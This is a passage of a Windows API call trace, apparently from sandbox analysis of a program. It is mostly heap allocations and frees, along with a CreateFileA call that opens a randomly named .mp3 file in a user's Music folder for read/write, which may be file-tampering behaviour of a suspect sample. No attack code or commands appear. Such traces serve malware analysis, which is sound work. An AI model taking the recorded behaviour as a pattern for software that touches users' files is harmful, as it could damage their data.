HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3", lpUsedDefaultChar=0x0) returned 95 [0185.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0185.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0185.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0185.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0185.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0185.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0185.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0185.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0185.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0185.423] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\egffoaa4l\\hdcqagk.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0185.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0185.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0185.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0185.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0185.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0185.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0185.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0185.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0185.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0185.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0185.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0185.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0185.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0185.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0185.425] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=95, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 95 [0185.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xbe) returned 0x9c3478 [0185.425] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=95, lpWideCharStr=0x9c3478, cchWideChar=95 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3") returned 95 [0185.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0185.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc0) returned 0x9c3540 [0185.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3478 | out: hHeap=0x8a0000) returned 1 [0185.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0185.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0185.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0185.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0185.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0185.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0185.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0185.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0185.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0185.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0185.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0185.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0185.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0185.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0185.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0185.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0185.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0185.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0185.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0185.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0185.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0185.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0185.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0185.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0185.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0185.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0185.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0185.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0185.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0185.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0185.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0185.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0185.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0185.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0185.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0185.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0185.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0185.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0185.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0185.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0185.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0185.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0185.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0185.427] FreeLibrary (hLibModule=0x75990000) returned 1 [0185.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0185.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0185.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0185.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0185.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0185.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0185.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0185.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0185.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0185.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0185.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0185.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0185.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0185.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0185.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0185.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0185.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0185.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0185.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0185.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0185.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0185.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0185.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0185.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0185.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0185.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0185.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0185.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0185.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0185.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0185.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0185.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0185.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0185.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0185.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0185.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0185.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0185.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0185.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0185.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0185.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0185.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0185.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0185.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0185.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0185.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0185.429] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0185.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0185.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0185.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0185.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0185.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0185.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0185.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0185.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0185.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0185.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0185.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0185.434] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0185.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0185.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0185.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0185.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0185.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0185.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0185.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0185.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0185.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0185.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0185.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0185.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0185.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0185.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0185.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0185.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0185.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0185.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0185.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0185.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0185.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0185.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0185.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0185.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0185.435] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0185.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0185.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0185.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0185.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0185.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0185.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0185.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0185.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0185.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0185.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0185.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0185.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0185.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0185.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0185.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0185.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0185.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0185.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0185.436] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0185.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0185.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0185.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0185.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9c70 [0185.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9b9c70, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0185.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0185.437] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0185.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0185.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0185.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0185.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0185.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0185.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0185.437] CloseHandle (hObject=0x120) returned 1 [0185.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0185.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0185.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0185.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0185.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0185.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0185.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0185.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0185.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0185.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0185.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0185.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0185.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0185.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0185.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0185.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0185.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0185.438] FreeLibrary (hLibModule=0x75990000) returned 1 [0185.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0185.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0185.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0185.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0185.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0185.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0185.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0185.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0185.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0185.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0185.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0185.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0185.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0185.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0185.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0185.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0185.439] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, 